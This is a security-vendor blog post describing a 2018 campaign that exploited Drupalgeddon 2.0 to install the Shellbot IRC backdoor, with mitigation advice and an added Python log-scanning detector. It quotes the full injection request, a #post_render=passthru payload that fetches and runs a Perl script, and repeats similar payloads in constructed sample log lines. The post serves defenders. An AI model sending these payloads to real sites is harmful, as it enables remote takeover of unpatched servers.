IBM Security’s Managed Security Services (MSS) team monitors the enterprise threat landscape on an ongoing basis, detecting and mapping new threats as they emerge. In a recent investigation, our MSS intelligence analysts discovered that malicious actors are using recent Drupal vulnerabilities to target various websites and possibly the underlying infrastructure that hosts them, leveraging Shellbot to open backdoors.

This appears to be a financially motivated effort to mass-compromise websites. How can defenders keep websites and underlying systems safe in the face of these evolving threats?

What Is Drupal, and Why Is It a Target?

Like WordPress, Drupal is a content management system (CMS) that is used widely by people who create and maintain websites and applications for all sorts of purposes, both personal and business, private and public. Drupal is open source and, as such, is maintained by a community of users. This is also how its security and vulnerability patching is maintained.

CMSs that are used across a large number of websites are juicy targets for cybercriminals, who commonly automate their attacks in a one-size-fits-all type of operation. Those who target random websites aim to compromise as many as possible and consider the monetization options later.

To do that, malicious actors often pick a vulnerability and then probe for exploitable sites en masse. Those found unpatched or vulnerable for some other reason might fall under the attacker’s control, which could mean a complete compromise of that site. With this level of control, the attacker has access to the site as a resource from which to steal data, host malicious content or launch additional attacks.

ShellBot Attacks Open Backdoors With Drupalgeddon 2.0

In recent investigations into malicious activity targeting enterprises across the globe, our team detected an IP address that was repeatedly sending the same HTTP POST request:

Suspicious request (sent repeatedly from a single IP address):

/?q=user/password&name[#type]=markup&name[#markup]=cd /tmp;wget /lip;perl;cd /tmp;curl -O /lip;perl lip;rm -rf lip*&name[#post_render][]=passthru

Further examination of these requests revealed additional sources of similar traffic from a number of command-and-control (C&C) servers, hosting servers that download a Perl script to launch the Shellbot malware and a payload naming pattern that started to paint the picture of a widespread cyberattack. Our team traced the beginning of this campaign to mid-August 2018.
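The request above carries Drupal Form API render-array properties (`#type`, `#markup`, `#post_render`) in parameter names, which is the shape of a Drupalgeddon 2.0 probe. The following detection is an added example, not IBM's or the campaign's code: it scans constructed Common Log Format lines for those property names (including double-encoded `%2523`) and rates a hit higher when a callback property such as `#post_render` is present. The sample log lines, the `example.invalid` host and the documentation-range IPs are constructed.

```python
import re
from typing import Optional
from urllib.parse import parse_qsl, unquote_plus

# Drupal Form API render-array properties; an anonymous form post should never
# name these in a parameter, and #post_render/#lazy_builder take callables.
RENDER_KEYS = ("#post_render", "#pre_render", "#lazy_builder",
               "#access_callback", "#markup", "#type")
CALLBACK_KEYS = ("#post_render", "#pre_render", "#lazy_builder", "#access_callback")
# Paths the campaign on this page probed before injecting.
SUSPECT_PATHS = ("user/password", "user/register")

# Common Log Format: client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample lines (not real campaign traffic); hosts are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Aug/2018:10:14:02 +0000] "POST /?q=user/password'
    '&name%5B%23type%5D=markup&name%5B%23markup%5D=cd%20/tmp;curl%20-O%20'
    'http://example.invalid/lip;perl%20lip&name%5B%23post_render%5D%5B%5D=passthru'
    ' HTTP/1.1" 200 1742',
    '198.51.100.7 - - [20/Aug/2018:10:14:09 +0000] "GET /user/password HTTP/1.1" 200 5120',
    '203.0.113.5 - - [20/Aug/2018:10:15:30 +0000] "GET /?q=user/register'
    '&name%5B%2523post_render%5D%5B%5D=exec HTTP/1.1" 404 210',
]


def inspect_request(target: str) -> Optional[dict]:
    """Flag a request target whose parameter *names* carry render-array keys."""
    _, _, query = target.partition("?")  # split before decoding: '#' is data here
    params = parse_qsl(query, keep_blank_values=True)
    # parse_qsl decodes once; decode again so %2523 (double-encoded '#') is caught.
    names = [unquote_plus(name) for name, _ in params]
    hits = sorted({k for n in names for k in RENDER_KEYS if k in n})
    if not hits:
        return None
    decoded = unquote_plus(unquote_plus(target))
    return {"keys": hits,
            "drupal_user_form": any(p in decoded for p in SUSPECT_PATHS),
            "severity": "high" if any(k in hits for k in CALLBACK_KEYS) else "medium"}


def scan_log(lines) -> list:
    """Run inspect_request over access-log lines. The status is kept because a
    4xx still proves the probe ran, even if the site was already patched."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        f = inspect_request(m["target"])
        if f:
            f.update(ip=m["ip"], method=m["method"], status=m["status"])
            findings.append(f)
    return findings
```

Access logs normally carry only the request line, so a POST that places the same parameters in the body would need a WAF or request-body log to catch; the query-string form on this page is visible in standard logs.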

Scan and Deploy

Scanning websites for vulnerable configurations, the attackers leveraged a critical remote code execution (RCE) vulnerability known as CVE-2018-7600, or Drupalgeddon 2.0, to eventually open a backdoor using the Shellbot malware. The scan also included a second vulnerability, CVE-2018-7602, another highly critical RCE flaw. Both flaws have been patched, but the vulnerabilities persist as users delay patching and upgrading.

As we continued to look into the attack, we saw that vulnerable websites were scanned for the /user/register and /user/password pages during the installation phase, as attackers tried to brute-force their way in with existing user access details they had discovered while attempting to “wget” the Perl script for Backdoor.Shellbot.

When successful, the script ran a shell command injection that was used to install the Perl-based bot. The Shellbot instance in our investigation connected to an Internet Relay Chat (IRC) channel and used it as a C&C hub to receive instructions from its controller. The bot contained multiple tools to perform distributed denial-of-service (DDoS) attacks and search for SQL injection weaknesses and other vulnerabilities, including privilege escalation to reach root level on the victimized system.

The vulnerabilities used in this campaign were leveraged in an automated way, allowing attackers to scan a large number of websites with minimal effort. Moreover, if successfully exploited, the flaw could lead to a potential compromise of the web application with the possibility of spilling over to the underlying operating system as well.

Shellbot Resurfaces

Shellbot itself is old code that has been around since about 2005, used maliciously to remotely access and control compromised endpoints. Shellbot can open remote command-line shells, perform denial-of-service attacks, run tasks and processes, download additional files on the attacker’s command and change the endpoint’s settings, to name a few capabilities.

Shellbot may seem dated and simplistic, but it is in active use by several threat groups. In March 2017, at the height of exploitation of the Apache Struts vulnerability (CVE-2017-5638), ShellBot was packaged as the C&C component with the PowerBot malware, which deployed cryptocurrency mining modules on infected devices. This combination allowed criminals to generate over $100k in illicit profits from their schemes.

Reviewing most of the Shellbot malware attacks we have detected in recent months, our team identified some variants with instructions to:

  • Terminate all running cryptocurrency mining activities before installing the attacker’s new cryptocurrency miner;
  • Host phishing campaigns;
  • Distribute phishing email spam;
  • Carry out various types of DDoS attacks; and
  • Exfiltrate data via a PHP module to a predetermined email address.

Attackers Bank on Old Vulnerabilities

It costs a lot of time and money to find or buy a zero-day flaw — two resources cybercriminals are typically not willing to invest. It is much more lucrative to use existing vulnerabilities such as Drupalgeddon and attack code in an automated way, especially when users delay patching and updating their applications.

Here are some tips from our security specialists on how to mitigate the risk from existing vulnerabilities and those who use them to compromise web resources and assets:

  • Use updated protocols such as HTTPS and upgrade if need be.
  • Update CMSs to the most recent version and use all available patches.
  • Perform input validation checks on all web applications to ensure that shell commands cannot be executed by any end user. Validate on both client and server side to ensure that scripting and malicious code cannot run on the underlying server or database.
  • Attackers will try to brute-force credentials; make sure that passwords are strong, encrypted and salted. Use two-factor authentication (2FA) to foil automated attacks.

Want to know more? Find indicators of compromise (IoCs) and more technical details about this campaign on X-Force Exchange.
